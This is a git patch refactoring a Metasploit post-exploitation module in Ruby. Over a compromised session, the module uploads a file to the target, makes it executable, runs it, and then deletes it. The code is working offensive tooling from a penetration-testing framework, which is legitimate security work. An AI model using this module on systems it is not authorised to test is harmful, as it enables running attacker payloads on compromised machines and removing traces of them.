From d5f5ef103ff9bd62af6e2146113c0f7affdd717d Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 21 Sep 2018 16:42:14 -0500 Subject: [PATCH] Refactor everything and add command output --- modules/post/multi/manage/upload_exec.rb | 95 +++++++++++------------- 1 file changed, 43 insertions(+), 52 deletions(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index f72af815e7..f29c5b0678 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -6,33 +6,54 @@ class MetasploitModule < Msf::Post include Msf::Post::File - def initialize(info={}) - super( update_info( info, - 'Name' => 'Upload and Execute', - 'Description' => %q{ Push a file and execute it }, - 'License' => MSF_LICENSE, - 'Author' => [ 'egypt'], - 'Platform' => [ 'win','linux','osx' ], - 'SessionTypes' => [ 'meterpreter','shell' ] + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Upload and Execute', + 'Description' => %q{Push a file and execute it.}, + 'Author' => 'egypt', + 'License' => MSF_LICENSE, + 'Platform' => ['win', 'unix', 'linux', 'osx'], + 'SessionTypes' => ['meterpreter', 'shell'] )) - register_options( - [ - OptPath.new('LPATH', [true, 'Local file path to upload and execute']), - OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']), - OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']), - OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 15]) - ]) + register_options([ + OptPath.new('LPATH', [true, 'Local file path to upload and execute']), + OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']), + OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']), + OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 15]) + ]) + end + + def run + upload_file(rpath, lpath) + + if session.platform == 'windows' + cmd = "cmd.exe /c start #{rpath}" + else + # Handle absolute paths + cmd = rpath.start_with?('/') ? rpath : "./#{rpath}" + end + + begin + # client is an alias for session + client.fs.file.chmod(rpath, 0700) + rescue + # Fall back if unimplemented or unavailable + cmd_exec("chmod 700 #{rpath}") + end + + output = cmd_exec(cmd, args, timeout) + vprint_good(output) unless output.blank? + + rm_f(rpath) + end + + def lpath + datastore['LPATH'] end def rpath - if datastore['RPATH'].blank? - remote_name = File.basename(datastore['LPATH']) - else - remote_name = datastore['RPATH'] - end - - remote_name + datastore['RPATH'].blank? ? File.basename(lpath) : datastore['RPATH'] end def args @@ -42,34 +63,4 @@ class MetasploitModule < Msf::Post def timeout datastore['TIMEOUT'] end - - def lpath - datastore['LPATH'] - end - - def run - upload_file(rpath, lpath) - - if session.platform.include?('windows') - cmd_exec("cmd.exe /c start #{rpath}", args, timeout) - else - # Handle absolute paths - if rpath.start_with?('/') - cmd = rpath - else - cmd = "./#{rpath}" - end - - if session.type == 'meterpreter' - # client is an alias for session - client.fs.file.chmod(rpath, 0700) - else - cmd_exec("chmod 700 #{rpath}") - end - - cmd_exec(cmd, args, timeout) - end - - rm_f(rpath) - end end